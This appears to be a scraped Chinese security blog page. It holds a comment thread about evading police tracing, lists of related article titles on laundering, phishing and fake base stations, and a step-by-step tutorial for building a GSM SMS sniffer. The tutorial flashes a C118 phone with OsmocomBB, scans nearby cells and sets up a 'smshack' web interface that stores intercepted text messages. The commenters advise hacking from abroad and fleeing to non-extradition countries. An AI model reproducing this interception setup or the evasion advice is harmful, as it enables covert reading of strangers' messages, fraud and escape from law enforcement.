私心是, 警察小弟取到了证据, 会受到重用, 警察老大完成了从案件的成立-侦察-证据搜集-侦破-移送起诉完整流程之后, 他首先会受到上层嘉奖,也不排除集体记功。 对他好的是, 这种案子不看过程只看后果, 涉及到邪教一直都是从严从重, 你要低头认错有关部门的老大看到后有可能会给你减个一两年。 他好象今年40多了, 出来也得五六十了, 活了半辈子的人还能被人当成棋子。。 真是日了人了。。 30# safe121 (www.safe121.com重開【???????????????????????????】回收懸賞帖金幣,收40%服務費) | 2015-08-05 23:27 都去了國外還回國幹錘子 NDS還是外企。。現在歸屬於cisco了 NDS is now part of Cisco Cisco and NDS will transform how service providers and media companies deliver next-generation video experiences to consumers worldwide. 日國內站還是去偉大的朝鮮才好,直接用當地3g網卡,帶個筆記本。 中國人在朝鮮用埃及的信號(高麗通信走埃及信號)和IP日中國站。看他怎麼查? 31# newline (我只相信狭路相逢勇者胜) | 2015-08-06 02:39 @safe121 你错了, 可以推演一下, 发展到恶性后果, 负责你案子的应该是什么部门 ,如果省级以下, 你跑到香港直接用香港的酒店网络连个VPN啥事没有, 如果省级以上, 首先要跑到和中国没有签定引渡协议的国家, 如果可以找到当地政府人士保护就想办法通过自己的方式支持该人, 如果找不到只要谴责声明一发一样被遣返,时间问题而已。 如果运气好, 找到了政府官员保护, 该国又是和中国存在纠纷国家, 你以为就太平了吗? 又错了, 海外执法队不知道你听说过没有。。。 运气好可以留下全尸。 再说, 跑到朝鲜, 是什么后果?运气不好, 人家嫌麻烦, 就直接毙了, 国内问起来就说这家伙拒捕伤人抗拒执法, 不了了之。 运气好, 敲碎膝盖骨,铁丝把两条腿串一起, 两个人民军士兵押送边防再移交负责部门。 相关内容: 反黑逆向溯源追踪之:某某某局入侵事件分析 JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 基于行为特征识别的网络诈骗嫌疑人追踪系统 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 DedeCMS 注入漏洞批量入侵爆菊 Exp 进入了路由器怎么让她进入我的钓鱼网页? 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 针对工行诈骗黑产团伙的调查回忆录 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 谷歌云端硬盘在天朝是否真的安全? 朋友点开一个文件给骗30万,一种“高级”QQ诈骗骗术,远控电脑诈骗 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 【讨论】今天偶遇淘宝另类“骗钱”技巧 淘宝一星期【骗】20万的可行性过程分析 服务器流量异常追踪--抵抗AWVS扫描 【略狗血】一种结合本地程序的更加猥琐的钓鱼方式(中招率+100%) 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 CDN流量放大攻击思路 讨论下快捷支付存在的风险 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 逆向追踪:查找360wifi(知道ssid)的使用者 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 简单分析丝绸之路创始人如何被抓,FBI真的能透过TOR获取真实IP么? 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 现在傻逼太多,骗人太好骗,淘宝搜剑灵激活码,好多10几块钱的骗子 如何看两个ip是不是在一个机房,路由追踪 猜想:利用GFW使中国对外网络瘫痪??? 逆向追踪之:网站被挂淘客跳转以后发生的事情 猜想_利用终端查询机日内网 免费购物 会员卡加钱??? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 别对我撒谎 让支付简单一点 如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 一个诈骗类的技术性问题,朋友的! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 女士回电信诈骗电话 几秒钟时间100元话费没了 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 小型APT之看我如何入侵电视,我是如何入侵智能电视的 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中... 针对莱特币的新木马被发现 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中... 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中... 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 微信聊天都是你好友吗?“诈骗”之“微信社工学” 【姊妹花】淘宝一敬业诈骗【50和我谈了一个小时】 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 雇黑客攻陷招生网站改成绩 3骗子做发财梦进看守所 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 公布一个非常高端的淘宝店铺骗局方法 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 【传奇】看职业骗子如何揭发谷歌广告服务的不法活动,谷歌5亿美元和解费 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 百度搜索页面劫持脚本,百度搜索来路页面跳转劫持,骗点击 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 一种猥琐方式的对攻击者定位(观315有感) 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 公安部督办QQ红钻诈骗案破获 腾讯损失3000余万 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 《XSS挖出一个黑产团体》 山寨广告非法医疗搜索引擎路在何方,医疗 = 巨型诈骗军团! 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析 [讨论]如何入侵一个户外的电子显示屏 探索网络出口GFW的强度与翻墙 二维码应用漏洞|欺骗|....更多好玩的??? [fixed]中国移动139邮箱之前的一个重置密码流程漏洞 耍了一个发给我网购木马的骗子~~ Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 骗子卖家利用淘宝交易漏洞骗流量 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 中斯警方联合行动抓获百名电信诈骗案嫌疑人 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 定位GFW的python脚本,如何找到GFW设备的IP地址 电话诈骗手段升级 听按键音破译银行密码 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 微博“兼职”被骗3000 上网“报警”又被骗1300 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 Android 无视屏幕解锁保护界面 - 安卓手机锁破解 网曝银行卡密码“漏洞” 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 十一黄金周 钓鱼网站常以优惠做诈骗噱头 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 男子淘宝购物10秒后接“卖家”电话 被骗7000元 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 非法获取百度推广账号 实施网络诈骗 篡改百度推广 市民被骗财 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 支付宝错发中奖短信 送236台iPad2 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统 6000万网民一年被骗300多亿元 奇虎360成功加入GFW防火长城 为国家安全保驾护航 著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 虚假客服电话充斥互联网行骗 专家:竞价排名是祸首 公布 GFW 防火墙旗下部分子服务器 IP 电信诈骗韩国人案抓235人 涉案金额1亿多 男子侵入上海移动平台群发广告短信牟利获刑 福布斯:IE10“禁止追踪”扼杀网络广告市场 网购158元的货物之后被网站“钓”走2万 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 浙江绍兴一犯罪团伙用网银漏洞诈骗三百余万获刑 看FBI是怎么网络钓鱼执法的 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 碰到一个冒充QQ好友进行诈骗的骗子…… 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 QQ邮箱漏洞被骗子利用 小企鹅一闪1000块被骗走 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 我国将建立IP地址黑名单制度 打击网络垃圾邮件 小米官网“闹鬼” 消费者买手机三千元被骗 末世入侵行动 (Fire Sale!) 末日入侵行动 黑客曝联通“10010短信”漏洞 被指易遭诈骗利用 网络钓鱼危急行业发展 专家呼吁各方合力围剿 黑客考虑发射通讯卫星对抗全球互联网监管 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”! 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 北京警方破获新型网络合同诈骗案 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 黑客的新目标:泄密其他黑客资料 台两15岁少年开淫窟 骗12名少女为“爱”卖身 月进300万元 【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 无银行卡,密码10万元1分钟转走,超级黑客? 【公告】公布一个特大诈骗案件的网络“黑客” DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 留言评论(旧系统): 佚名 @ 2015-08-11 22:08:32 海外执法队是个毛。。。 在外面拖时间花半年和几万块买个圣基茨和尼维斯的护照过去可以躲么 本站回复: 没被人间蒸发么?-_-!!! 佚名 @ 2015-12-13 20:37:21 此专案组长为ga部副部长 本站回复: 你懂的……

2015/8/10
articleCard.readMore

GSM Sniffer WEB 界面搭建测试

GSM Sniffer WEB界面搭建测试 三好学生 | 2015-07-29 12:00 0x00 前言 感谢一只猿、le4f提供资料,极大缩短学习时间。 初学GSM Sniffer,本文记录全部学习测试过程。 0x01 参考资料 http://www.92ez.com/?action=show&id=1 http://92ez.com/py/ ttp://jingyan.baidu.com/article/9113f81b24aa9a2b3214c721.html http://blog.csdn.net/zhaozhanyong/article/details/45888383 0x02 测试环境 1.c118摩托罗拉手机(淘宝购买¥25) 2.c118刷机线(淘宝购买¥25) 3.kali linux 0x03 测试过程 一、建立Arm代码的编译环境,默认目录在Root下,依次执行如下命令: sudo apt-get install build-essential libgmp3-dev libmpfr-dev libx11-6 libx11-dev texinfo flex bison libncurses5 libncurses5-dbg libncurses5-dev libncursesw5 libncursesw5-dbg libncursesw5-dev libpcsclite-dev zlibc zlib1g-dev libmpfr4 libmpc-dev mkdir armtoolchain cd armtoolchain/ wget http://bb.osmocom.org/trac/raw-attachment/wiki/GnuArmToolchain/gnu-arm-build.2.sh mkdir build install src cd src wget http://ftp.gnu.org/gnu/gcc/gcc-4.5.2/gcc-4.5.2.tar.bz2 wget http://ftp.gnu.org/gnu/binutils/binutils-2.21.1a.tar.bz2 wget ftp://sources.redhat.com/pub/newlib/newlib-1.19.0.tar.gz cd .. ./gnu-arm-build.2.sh echo "export PATH=\$PATH:/root/armtoolchain/install/bin">>/root/.bashrc source /root/.bashrc 二、下载osmocombb源码进行编译,依次执行如下命令: cd ~ git clone git://git.osmocom.org/osmocom-bb.git git clone git://git.osmocom.org/libosmocore.git cd ~/libosmocore sudo apt-get install autoconf automake libtool autoreconf -i ./configure make sudo make install cd ~/osmocom-bb git checkout --track origin/luca/gsmmap cd src make 三、刷机 1、C118连接kali linux 将C118手机关机,连接刷机线,连接kali linux 连接后,执行lsusb命令查看USB设备,出现CP210x说明已被识别,如图1: 此过程最容易出现的问题是接线不牢,无法刷机 *判断是否连接正常的小方法: 如果正常连接,会听到手机发出嗡嗡的声音(至少我的这台c118是这种情况) 2、开始刷机 在听到手机发出嗡嗡的声音后, 执行如下命令: cd ~/osmocom-bb/src/host/osmocon/ ./osmocon -m c123xor -p /dev/ttyUSB0 ../../target/firmware/board/compal_e88/layer1.compalram.bin 四、sniffer阶段 1、扫描基站: cd armtoolchain/osmocom-bb/src/host/layer23/src/misc/ ./cell_log -O 2、开始监听 新开窗口: cd armtoolchain/osmocom-bb/src/host/layer23/src/misc/ ./ccch_scan -i 127.0.0.1 -a 基站编号 3、抓包分析 wireshark -k -i lo -f 'port 4729' 五、WEB界面搭建 1、下载web界面程序 下载http://92ez.com/py/中的文件 getusb.sh、 m.py、 smshack_nosql.py、 smshack.sql 以上4个文件放在root文件夹下 sms_web文件夹复制到/var/www/下 2、安装phpadmin sudo apt-get install phpmyadmin cd /var/www/ sudo ln -s /usr/share/phpmyadmin phpmyadmin 3、导入数据库 打开浏览器,输入http://localhost/phpadmin 通过界面导入smshack.sql 4、修改m.py设置登陆MySql的用户名密码、数据库名称 与配置phpadmin时提示的user、password对应 db为数据库名称,填smshack就好 5、执行 python m.py 按提示操作 6、访问界面 浏览器访问http://localhost/sms_web 0x04 小结 以上是基于一只猿分享的资料进行测试,共耗时一天,个人体会:易于上手,难于精通 [原文地址] 相关内容: 号称不会被查水表的通信APP-Telegram,悬赏20万美元求漏洞 社会工程学:一张SIM卡引发的连锁社工人肉案例 讨论:如何在网络上保护个人隐私?互联网时代的隐私泄露与安全保护? MD5散列密码不等于MD5的安全性 [翻译]Python开发中的密码散列(Hashing) wifi环境下获取对方手机号码的可能性 JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 三种方法还原ASP.NET可逆加密内容 WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒! 讨论:关于手机话费套现的问题,手机的电话费如何套现? 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本 现实生活中的社工:批量搞同学校里妹子QQ、手机等信息,伪装老师套学生信息 伪装快递打电话社工地址,我这样用手机社目标住址大家觉得可行吗? 移动"4G"卡所带来的威胁,随便补办别人手机卡?4G换卡补办别人手机号? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 对小米论坛泄露数据的一次分析 密码成功破解率高达37.8% 讨论:因为这次小米信息泄漏事件,总结一下数据泄漏造成的危害 python加密通讯后门 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? 中航信系统漏洞泄露乘客信息,查询任意航班乘机人姓名,航班号,身份证,手机号 移动电源内置窃听器,在淘宝上买的充电宝内置远程定位、监听硬件后门! APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 采集指定域名邮箱用于社工或者fuzz的PHP小脚本 基于行为特征识别的网络诈骗嫌疑人追踪系统 社工算是一种技术吗?社会工程学讨论…… 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 Angry Birds和广告系统泄露个人信息——FireEye对Angry Birds的分析 2014 最新 web qq 密码的加密方式分析过程,WebQQ 登陆密码加密算法分析 小米手机客户资料泄露了吗?冒充小米售后回访诈骗电话:01053799231 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全 黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神 女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 发个社工福利站,搜库 - 密码泄露查询,社工库,泄露密码查询库 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 京东惨招恶意炒作,数据库泄露为撞库攻击 DedeCMS 注入漏洞批量入侵爆菊 Exp 进入了路由器怎么让她进入我的钓鱼网页? 已知IP能定位到多么具体的地理位置?市级? 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 探秘国际职业黑客:插U盘植入木马如同拍电影,做得上班族扮得007,社工大师 求助加密代码解密!!!比较另类的“加密”一句话木马后门…… 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 定位系统那些事儿 利用声学密码分析攻击破译4096位RSA加密算法 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 记一次 三打哈网 社工获取到服务器 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 搞到另外一个妹子运动会的照片,求眼尖的看看是哪所学校 讨论一下,怎么才能社工到岛国AV女优的真实资料,例如:泷泽萝拉 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 社工思路讨论:如何根据蛛丝马迹来找到具体的人或者物? 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 遇到一个加密方式 只有1和0 求大神告知,二进制字符串“加密” 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) 社工某黑阔大牛的域名,“脑残”客服,狗血 +10086!!! GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 为什么所有的无线频率都是2.4GHz? 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 社工个人电脑到内网渗透系列 如何通过域账户来定位域机器 服务器流量异常追踪--抵抗AWVS扫描 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 从丝绸之路到安全运维与风险控制 上集 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 逆向追踪:查找360wifi(知道ssid)的使用者 Windows下的无线热点蜜罐 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 各位黑括小心cmd5泄漏自己 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 在申诉中猜想QQ密码可能明文储存,讨论腾讯申诉“历史密码”机制 